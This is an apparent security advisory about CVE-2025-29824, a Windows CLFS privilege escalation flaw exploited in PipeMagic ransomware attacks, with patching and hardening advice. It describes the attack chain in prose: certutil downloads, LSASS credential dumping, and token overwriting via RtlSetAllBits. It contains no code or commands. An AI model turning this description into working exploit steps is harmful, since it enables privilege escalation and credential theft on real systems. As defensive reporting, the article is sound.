In April 2025, Microsoft disclosed a critical security flaw within the Windows Common Log File System (CLFS), identified as CVE-2025-29824. This privilege escalation vulnerability was actively exploited in targeted ransomware attacks across various sectors, including information technology, real estate, finance, software development, and retail.
The exploitation campaign, tracked by Microsoft under the codename Storm-2460, involved the deployment of a sophisticated malware known as PipeMagic. This plugin-based trojan has been in circulation since 2022 and has been previously associated with other zero-day exploits, notably CVE-2025-24983 and CVE-2023-28252.
Attack Methodology:
The exact initial access vector utilized by the attackers remains undetermined. However, observed tactics include the use of the certutil utility to download malicious payloads from compromised legitimate websites. These payloads often take the form of malicious MSBuild files containing encrypted data, which, upon execution, unpack and launch the PipeMagic trojan.
Once activated, PipeMagic exploits the CLFS vulnerability to escalate privileges to SYSTEM level. This escalation enables the malware to perform a series of malicious activities:
– Credential Dumping: The malware extracts user credentials by accessing the memory of the Local Security Authority Subsystem Service (LSASS).
– Ransomware Deployment: Following credential extraction, the malware encrypts files on the compromised system, appending a random extension to the affected files.
Although Microsoft was unable to obtain a sample of the ransomware for detailed analysis, the ransom notes left on encrypted systems contained links to a TOR domain associated with the RansomEXX ransomware family.
Technical Details:
The CLFS vulnerability exploited in these attacks allows for memory corruption within the kernel driver. By leveraging this flaw, the exploit manipulates the RtlSetAllBits API to overwrite the process token with the value 0xFFFFFFFF. This manipulation grants the process all possible privileges, facilitating further malicious actions such as injecting code into SYSTEM processes.
It’s noteworthy that Windows 11, version 24H2, is not susceptible to this specific exploitation. In this version, access to certain System Information Classes within NtQuerySystemInformation is restricted to users possessing SeDebugPrivilege, typically limited to administrative users.
Historical Context:
The PipeMagic trojan has a history of exploiting zero-day vulnerabilities within the Windows operating system. In March 2025, ESET researchers identified that PipeMagic was used to exploit CVE-2025-24983, a use-after-free vulnerability in the Windows Win32 Kernel Subsystem. This flaw allowed attackers to escalate privileges to SYSTEM level on older Windows versions, including Windows 8.1 and Server 2012 R2. The exploit had been active since March 2023, highlighting the persistent threat posed by such vulnerabilities.
Additionally, in April 2023, Kaspersky reported that PipeMagic was linked to Nokoyawa ransomware attacks exploiting another CLFS zero-day vulnerability, CVE-2023-28252. This pattern underscores the trojan’s adaptability and the critical need for timely patching of known vulnerabilities.
Mitigation and Recommendations:
Microsoft has addressed the CVE-2025-29824 vulnerability in its April 2025 Patch Tuesday update. Organizations are strongly advised to apply this update promptly to mitigate the risk of exploitation.
To further protect against such threats, organizations should:
– Regularly Update Systems: Ensure that all systems are up-to-date with the latest security patches and updates.
– Implement Least Privilege Access: Restrict user permissions to the minimum necessary for their roles to limit the potential impact of a compromised account.
– Monitor Network Activity: Utilize intrusion detection and prevention systems to monitor for unusual network activity that may indicate a compromise.
– Educate Employees: Conduct regular cybersecurity training to raise awareness about phishing attacks and the importance of not downloading or executing unverified files.
By adopting these measures, organizations can enhance their resilience against sophisticated malware campaigns like those involving the PipeMagic trojan.
